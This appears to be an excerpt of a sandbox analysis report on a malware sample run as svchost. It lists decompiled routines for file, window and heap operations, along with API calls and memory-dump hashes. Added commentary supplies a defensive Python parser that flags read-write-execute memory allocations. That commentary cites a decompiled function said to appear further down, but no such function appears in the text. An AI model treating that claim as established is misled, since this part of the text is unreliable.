    • API ID: Heap$AllocateCreateDestroyVersion
    • String ID:
    • API String ID: 760317429-0
    • Opcode ID: cfbd5988643477985f38bb479e9ee5f2aba22e3c5d935e2565ae317537ac9425
    • Instruction ID: cf03a4b162572e45c248adf41b665e613762ef543446486fbdc4ba5193130576
    • Opcode Fuzzy Hash: cfbd5988643477985f38bb479e9ee5f2aba22e3c5d935e2565ae317537ac9425
    • Instruction Fuzzy Hash: 8FF06570980341AAEF606B355C85BBA3690A7D0765F20C87BF40DC91A1EF7894C1961E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E00483BDD(void* __ecx, void* __edi, void* __esi) {
    				void* _t7;
    				void* _t8;
    				signed int _t11;
    				void* _t15;
    				void* _t20;
    				void* _t22;
    
    				_push(__esi);
    				_t20 = __ecx;
    				_t15 = 0;
    				_t7 =  *(__ecx + 4);
    				if(_t7 != 0xffffffff) {
    					_t11 = FindCloseChangeNotification(_t7); // executed
    					asm("sbb edi, edi");
    					_t15 =  ~_t11 + 1;
    				}
    				 *(_t20 + 4) =  *(_t20 + 4) | 0xffffffff;
    				 *(_t20 + 8) =  *(_t20 + 8) & 0x00000000;
    				_t8 = E0048324D(_t20 + 0xc, _t20);
    				if(_t15 != 0) {
    					return E00488652(_t22, GetLastError(), 0);
    				}
    				return _t8;
    			}


    APIs
    • FindCloseChangeNotification.KERNELBASE(00000001,?,?,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483BEC
    • GetLastError.KERNEL32(00000000,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483C11
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ChangeCloseErrorFindLastNotification
    • String ID:
    • API String ID: 1687624791-0
    • Opcode ID: 8d3140f9479da9b3b23491ce4aa34307c9b239d6bf73abccd09aa20615cca5fa
    • Instruction ID: c25935b38089dc33ac9e3dc80a0a72eba11417365258a387dcd965eb98f43223
    • Opcode Fuzzy Hash: 8d3140f9479da9b3b23491ce4aa34307c9b239d6bf73abccd09aa20615cca5fa
    • Instruction Fuzzy Hash: 98E092361007005BC3246B39CD09A5F7299AFD1B36F908F2EE57AC31E1CFB899058714
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00483ADF(void* __ecx, void* _a4, long _a8) {
    				void* __ebp;
    				int _t8;
    				void* _t14;
    
    				if(_a8 != 0) {
    					_t8 = ReadFile( *(__ecx + 4), _a4, _a8,  &_a8, 0); // executed
    					if(_t8 == 0) {
    						E00488652(_t14, GetLastError(), _t8);
    					}
    					return _a8;
    				}
    				return 0;
    			}






    Statement addresses (the assembly column did not survive export): 0x00483ae6, 0x00483afb, 0x00483b03, 0x00483b0d, 0x00483b0d, 0x00000000, 0x00483b12, 0x00000000

    APIs
    • ReadFile.KERNELBASE(?,?,00000000,00000000,00000000,?,0040BA8C,00000000,?,?,?,00000020,00000000), ref: 00483AFB
    • GetLastError.KERNEL32(00000000,?,0040BA8C,00000000,?,?,?,00000020,00000000), ref: 00483B06
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorFileLastRead
    • String ID:
    • API String ID: 1948546556-0
    • Opcode ID: c9966699da0b13ed726d343e574835c0601bd6290ac9eab7714f47aab154512e
    • Instruction ID: a84ec9aa55fa59e60ae9caea0285029cfe1130f1885002ffc46c72fb6a492a7b
    • Opcode Fuzzy Hash: c9966699da0b13ed726d343e574835c0601bd6290ac9eab7714f47aab154512e
    • Instruction Fuzzy Hash: 50E01A72204208BACF106FA0CD04B9E37ACAB14711F40C866B91889111D779DA109B18
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00483B64(void* __ecx, long _a4, long _a8) {
    				long _t4;
    				long _t9;
    				void* _t10;
    
    				_t4 = SetFilePointer( *(__ecx + 4), _a4, 0, _a8); // executed
    				_t9 = _t4;
    				if(_t9 == 0xffffffff) {
    					E00488652(_t10, GetLastError(), 0);
    				}
    				return _t9;
    			}






    Statement addresses (the assembly column did not survive export): 0x00483b72, 0x00483b78, 0x00483b7d, 0x00483b88, 0x00483b88, 0x00483b90

    APIs
    • SetFilePointer.KERNELBASE(?,?,00000000,?), ref: 00483B72
    • GetLastError.KERNEL32(00000000), ref: 00483B81
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: ErrorFileLastPointer
    • String ID:
    • API String ID: 2976181284-0
    • Opcode ID: a320ac0dd32bb0e87696fe87cb987a54176d1ba438d0b9c804a064e72df4e980
    • Instruction ID: d03d4cf21c8217914cfb0a045216b8992f8c06247af4a2e11707103b1fd8691f
    • Opcode Fuzzy Hash: a320ac0dd32bb0e87696fe87cb987a54176d1ba438d0b9c804a064e72df4e980
    • Instruction Fuzzy Hash: 90D05E325052207BC6103BA49D09F4ABA10AB24771F008E7BF6A4961E0C77188109795
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00417DF0(intOrPtr _a4) {
    				int _t3;
    				CHAR* _t7;
    
    				_t3 = wsprintfA(_t7, 0x4acdfc, _a4);
    				E00417E20( &(_t7[0xc]), 0); // executed
    				return _t3;
    			}





    Statement addresses (the assembly column did not survive export): 0x00417e02, 0x00417e17, 0x00417e1f

    APIs
    • wsprintfA.USER32 ref: 00417E02
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: wsprintf
    • String ID: ^I
    • API String ID: 2111968516-3473481074
    • Opcode ID: f129f87c1420ba8bd3e6fe6c7440591b3ad6696b58ebc2225540f945601d2827
    • Instruction ID: 212c34ea4e534eb2ea5799478f7159daee0002d5588ac54be613208c763618a4
    • Opcode Fuzzy Hash: f129f87c1420ba8bd3e6fe6c7440591b3ad6696b58ebc2225540f945601d2827
    • Instruction Fuzzy Hash: 22D0A7B8504300BBC214E7249C46F2B3776BBE0704F80882DFD05521C1EB78D918C5CE
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01280625
    • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 01280658
    Memory Dump Source
    • Source File: 00000007.00000003.319744915.0000000001280000.00000040.00001000.00020000.00000000.sdmp, Offset: 01280000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_3_1280000_svchost.jbxd
    Similarity
    • API ID: Virtual$AllocFree
    • String ID:
    • API String ID: 2087232378-0
    • Opcode ID: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction ID: 7258e169622909f7c37a01b95cd28206315578844d3a800f394b70e9254e2324
    • Opcode Fuzzy Hash: 8f1e82fa3ca701645e3a29dd561cede71442c6ae341de50c792d69400040f94a
    • Instruction Fuzzy Hash: 60215B31A11219BFDB009FA4DC41BEEFFF5FB54294F20C122FA10A22C0E7744A559B64
    Uniqueness

    Uniqueness Score: -1.00%
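
    The "APIs" bullets in these records are the part of the report an analyst most often wants in machine-readable form: API name, module, the argument snapshot (with "?" where the sandbox could not resolve a value) and the call-site address after "ref:". The Python below is an added example, not code from Joe Sandbox or from the sample, that parses lines of that shape and applies one practitioner check on top: flag VirtualAlloc calls whose flProtect argument is PAGE_EXECUTE_READWRITE (0x40). The VirtualAlloc in the record just above asks for PAGE_READWRITE (0x4); the decompiled E0050ABE6 further down requests 0x40. The input is constructed from lines on this page plus one made-up line for that second case, whose ref address is a placeholder.

```python
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed input. The first five lines are copied from "APIs" entries of this report;
# the sixth is made up in the same shape for the VirtualAlloc(0, 0x1000, MEM_COMMIT,
# PAGE_EXECUTE_READWRITE) call seen in the decompiled E0050ABE6, with a placeholder
# ref address that the report itself does not print.
SAMPLE_API_LINES = """\
• FindCloseChangeNotification.KERNELBASE(00000001,?,?,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483BEC
• GetLastError.KERNEL32(00000000,00483934,?,?,0040BB07,?,00000020,00000000), ref: 00483C11
• __EH_prolog.LIBCMT ref: 00484ABE
  • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01280625
• VirtualAlloc.KERNELBASE(00000000,00001000,00001000,00000040), ref: 0050A000
"""

_ENTRY = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"  # nested-call marker
    r"(?P<api>[A-Za-z_][\w$]*)\.(?P<mod>[A-Za-z0-9_]+)"          # Api.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                                  # optional (arg,arg,...)
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"                     # call-site address
)

PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int
    args: List[Optional[int]] = field(default_factory=list)  # None for "?" / non-hex tokens
    raw_args: List[str] = field(default_factory=list)
    subcall_of: Optional[int] = None


def _hex_or_none(tok: str) -> Optional[int]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{1,8}", tok) else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse report 'APIs' bullets; lines that do not match the shape are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = _ENTRY.match(line)
        if not m:
            continue
        raw = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            ref=int(m.group("ref"), 16),
            args=[_hex_or_none(a) for a in raw],
            raw_args=raw,
            subcall_of=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


def rwx_allocations(calls: List[ApiCall]) -> List[ApiCall]:
    """VirtualAlloc calls whose flProtect (4th argument) is PAGE_EXECUTE_READWRITE.

    An unresolved "?" protection is not flagged: the report did not record it,
    so the check stays silent rather than guessing."""
    return [c for c in calls
            if c.api == "VirtualAlloc" and len(c.args) >= 4
            and c.args[3] == PAGE_EXECUTE_READWRITE]


def calls_by_module(calls: List[ApiCall]) -> Dict[str, int]:
    """How many entries resolve to each module (KERNELBASE vs KERNEL32 etc.)."""
    return dict(Counter(c.module for c in calls))
```

    Run it over the whole exported report to get a flat list of (api, module, ref) triples; the "Part of subcall function" marker is kept in subcall_of so a hit can be traced back to the caller the report attributes it to.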

    C-Code - Quality: 100%
    			E00484AB9(void* __edx) {
    				void* _t37;
    				void* _t43;
    				intOrPtr _t52;
    				signed int _t55;
    				signed int _t59;
    				intOrPtr* _t62;
    				void* _t63;
    				intOrPtr* _t68;
    				intOrPtr _t75;
    				void* _t78;
    				void* _t80;
    
    				_t63 = __edx;
    				E00473304(E00490C8C, _t78);
    				 *((intOrPtr*)(_t78 - 0x10)) = _t80 - 0x34;
    				_t52 = E0048CC47(0x4e140c, E0048BFC8);
    				_t55 = 7;
    				_t3 = _t52 + 0x34; // 0x34
    				 *(_t78 - 4) =  *(_t78 - 4) & 0x00000000;
    				 *((intOrPtr*)(_t78 - 0x14)) = _t52;
    				_t37 = memcpy(_t78 - 0x40, _t3, _t55 << 2);
    				_t75 =  *((intOrPtr*)(_t78 + 0x10));
    				_t68 =  *((intOrPtr*)(_t78 + 8));
    				 *_t37 =  *(_t78 + 0xc);
    				 *((intOrPtr*)(_t52 + 0x3c)) =  *((intOrPtr*)(_t78 + 0x14));
    				 *((intOrPtr*)(_t52 + 0x38)) = _t75;
    				 *((intOrPtr*)(_t52 + 0x40)) =  *((intOrPtr*)(_t78 + 0x18));
    				if(_t75 == 2) {
    					_t62 =  *((intOrPtr*)(_t68 + 0x34));
    					if(_t62 != 0) {
    						 *((intOrPtr*)( *_t62 + 0x5c))(0);
    					}
    				}
    				 *(_t78 + 0xc) =  *(_t78 + 0xc) & 0x00000000;
    				if(_t75 == 0x110) {
    					E00484946(_t68, _t78 - 0x24, _t78 + 0xc);
    				}
    				 *((intOrPtr*)(_t78 + 8)) =  *((intOrPtr*)( *_t68 + 0x98))(_t75,  *((intOrPtr*)(_t78 + 0x14)),  *((intOrPtr*)(_t78 + 0x18)));
    				if(_t75 == 0x110) {
    					E00484969(_t63, _t68, _t78 - 0x24,  *(_t78 + 0xc));
    				}
    				_t29 = _t52 + 0x34; // 0x34
    				_t59 = 7;
    				_t43 = memcpy(_t29, _t78 - 0x40, _t59 << 2);
    				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
    				return _t43;
    			}














    Statement addresses (the assembly column did not survive export): 0x00484ab9, 0x00484abe, 0x00484ace, 0x00484adb, 0x00484adf, 0x00484ae3, 0x00484ae6, 0x00484aec, 0x00484aef, 0x00484af4, 0x00484af7, 0x00484afa, 0x00484b02, 0x00484b08, 0x00484b0b, 0x00484b0e, 0x00484b10, 0x00484b15, 0x00484b1b, 0x00484b1b, 0x00484b15, 0x00484b1e, 0x00484b28, 0x00484b33, 0x00484b33, 0x00484b4f, 0x00484b52, 0x00484b5c, 0x00484b5c, 0x00484b9c, 0x00484b9f, 0x00484ba3, 0x00484baa, 0x00484bb3

    APIs
    • __EH_prolog.LIBCMT ref: 00484ABE
      • Part of subcall function 0048CC47: TlsGetValue.KERNEL32(004E141C,00000000,?,00483883,0048BFC8,?,?,00483860,?,0040AB42,000007DD,?,00000000), ref: 0048CC86
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: H_prologValue
    • String ID:
    • API String ID: 3700342317-0
    • Opcode ID: 233cf5806107037b0851c320a36c04d5b6adc674a29c3c3d41dd29189998e9be
    • Instruction ID: 6bd00d7da688e16720338f0aafff8b5326405ec5666fe8715f1f86c18ea4ffb4
    • Opcode Fuzzy Hash: 233cf5806107037b0851c320a36c04d5b6adc674a29c3c3d41dd29189998e9be
    • Instruction Fuzzy Hash: 0A214872A00219EFDF15EF54C481AEE7BA9EF84354F00446AF909AB241D778AE41CB94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E004851E0(intOrPtr* __ecx, long _a4, CHAR* _a8, CHAR* _a12, long _a16, int _a20, int _a24, int _a28, int _a32, struct HWND__* _a36, struct HMENU__* _a40, void* _a44) {
    				long _v8;
    				CHAR* _v12;
    				CHAR* _v16;
    				long _v20;
    				int _v24;
    				int _v28;
    				int _v32;
    				int _v36;
    				struct HWND__* _v40;
    				struct HMENU__* _v44;
    				struct HINSTANCE__* _v48;
    				void* _v52;
    				void* __ebp;
    				struct HWND__* _t59;
    				struct HWND__* _t74;
    				intOrPtr* _t76;
    
    				_v8 = _a4;
    				_v12 = _a8;
    				_v16 = _a12;
    				_v20 = _a16;
    				_v24 = _a20;
    				_v28 = _a24;
    				_v32 = _a28;
    				_v36 = _a32;
    				_v40 = _a36;
    				_t76 = __ecx;
    				_v44 = _a40;
    				_v48 =  *((intOrPtr*)(E0048C6BF() + 8));
    				_v52 = _a44;
    				_push( &_v52);
    				if( *((intOrPtr*)( *_t76 + 0x5c))() != 0) {
    					_push(_t76);
    					E00485152();
    					_t59 = CreateWindowExA(_v8, _v12, _v16, _v20, _v24, _v28, _v32, _v36, _v40, _v44, _v48, _v52); // executed
    					_t74 = _t59;
    					if(E0048519E() == 0) {
    						 *((intOrPtr*)( *_t76 + 0xa4))();
    					}
    					return 0 | _t74 != 0x00000000;
    				}
    				 *((intOrPtr*)( *_t76 + 0xa4))();
    				return 0;
    			}



















    Statement addresses (the assembly column did not survive export): 0x004851ea, 0x004851f0, 0x004851f6, 0x004851fc, 0x00485202, 0x00485208, 0x0048520e, 0x00485214, 0x0048521a, 0x00485220, 0x00485222, 0x00485230, 0x00485236, 0x0048523b, 0x00485243, 0x00485254, 0x00485255, 0x0048527e, 0x00485284, 0x0048528d, 0x00485293, 0x00485293, 0x00000000, 0x004852a0, 0x00485249, 0x00000000

    APIs
    • CreateWindowExA.USER32(00000000,00000080,0043C571,?,?,?,?,?,?,?,?,?), ref: 0048527E
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: CreateWindow
    • String ID:
    • API String ID: 716092398-0
    • Opcode ID: ee3e069548fcee52daa759e60350ae6bbab32fd5b98d2be2b434539d6035b7b2
    • Instruction ID: b31d22a1fe4475b7376297e7bc0a165314d3428bf369717753a51afca0491d69
    • Opcode Fuzzy Hash: ee3e069548fcee52daa759e60350ae6bbab32fd5b98d2be2b434539d6035b7b2
    • Instruction Fuzzy Hash: DA319C79A00219AFCF41DFA8C944ADEBBF1BF4C314B11446AF918E7310E7359A519FA4
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E004854D0(void* __ecx) {
    				void* _t8;
    				int _t10;
    				int _t15;
    				intOrPtr* _t19;
    				void* _t22;
    				void* _t24;
    
    				_t24 = __ecx;
    				if( *((intOrPtr*)(__ecx + 0x1c)) != 0) {
    					_push(0);
    					_t3 = E00484C12() + 4; // 0x4
    					_t8 = E00482C51(_t3,  *(_t24 + 0x1c));
    					_t19 =  *((intOrPtr*)(_t24 + 0x38));
    					_t22 = _t8;
    					if(_t19 != 0) {
    						_t10 =  *((intOrPtr*)( *_t19 + 0x50))();
    					} else {
    						_t10 = DestroyWindow( *(_t24 + 0x1c)); // executed
    					}
    					_t15 = _t10;
    					if(_t22 == 0) {
    						E00484D02(_t24);
    					}
    					return _t15;
    				} else {
    					return 0;
    				}
    			}









    Statement addresses (the assembly column did not survive export): 0x004854d1, 0x004854d7, 0x004854df, 0x004854e9, 0x004854ec, 0x004854f1, 0x004854f4, 0x004854f8, 0x00485507, 0x004854fa, 0x004854fd, 0x004854fd, 0x0048550c, 0x0048550e, 0x00485512, 0x00485512, 0x0048551c, 0x004854d9, 0x004854dc, 0x004854dc

    APIs
    • DestroyWindow.USER32(00000000,00000000,00000000,?,?,?,00485358,^I,?,00414E0C), ref: 004854FD
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: 5e752744249cf693c449438708b0452e10239b3df346c48ed9b414cc7a1f9b88
    • Instruction ID: b26c03780e52c495fe99efb5924b3ae9fc1845b2a3fd7aab5a1c4a3191b3a0f2
    • Opcode Fuzzy Hash: 5e752744249cf693c449438708b0452e10239b3df346c48ed9b414cc7a1f9b88
    • Instruction Fuzzy Hash: 70F0A731205A01AFDB647F25F959B5F77A5FF80719B01487FF40287661EB64DC468B04
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041B060(void* __ecx, long _a4) {
    				void* _v8;
    				void* _t7;
    				void* _t11;
    
    				_t11 =  *0x4c97bc; // 0xae0000
    				_t7 = RtlAllocateHeap(_t11, 0, _a4); // executed
    				_v8 = _t7;
    				if(_v8 == 0) {
    					E00417DF0(_a4);
    				}
    				return _v8;
    			}






    Statement addresses (the assembly column did not survive export): 0x0041b06a, 0x0041b071, 0x0041b077, 0x0041b07e, 0x0041b084, 0x0041b089, 0x0041b092

    APIs
    • RtlAllocateHeap.NTDLL(00AE0000,00000000,?), ref: 0041B071
      • Part of subcall function 00417DF0: wsprintfA.USER32 ref: 00417E02
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: AllocateHeapwsprintf
    • String ID:
    • API String ID: 1352872168-0
    • Opcode ID: 9212650fad78315cff7f55bbc62bce5e3cb9f5e3fd40723f76164925141d8756
    • Instruction ID: 9e747384a05daca50358990f612c59e048caf88d5c36d495edb59f0dd1a90023
    • Opcode Fuzzy Hash: 9212650fad78315cff7f55bbc62bce5e3cb9f5e3fd40723f76164925141d8756
    • Instruction Fuzzy Hash: F1E08CB990120CFBCB00DF94E945EAF77B8EB08300F0081A9F90847340D636AE40CBD8
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
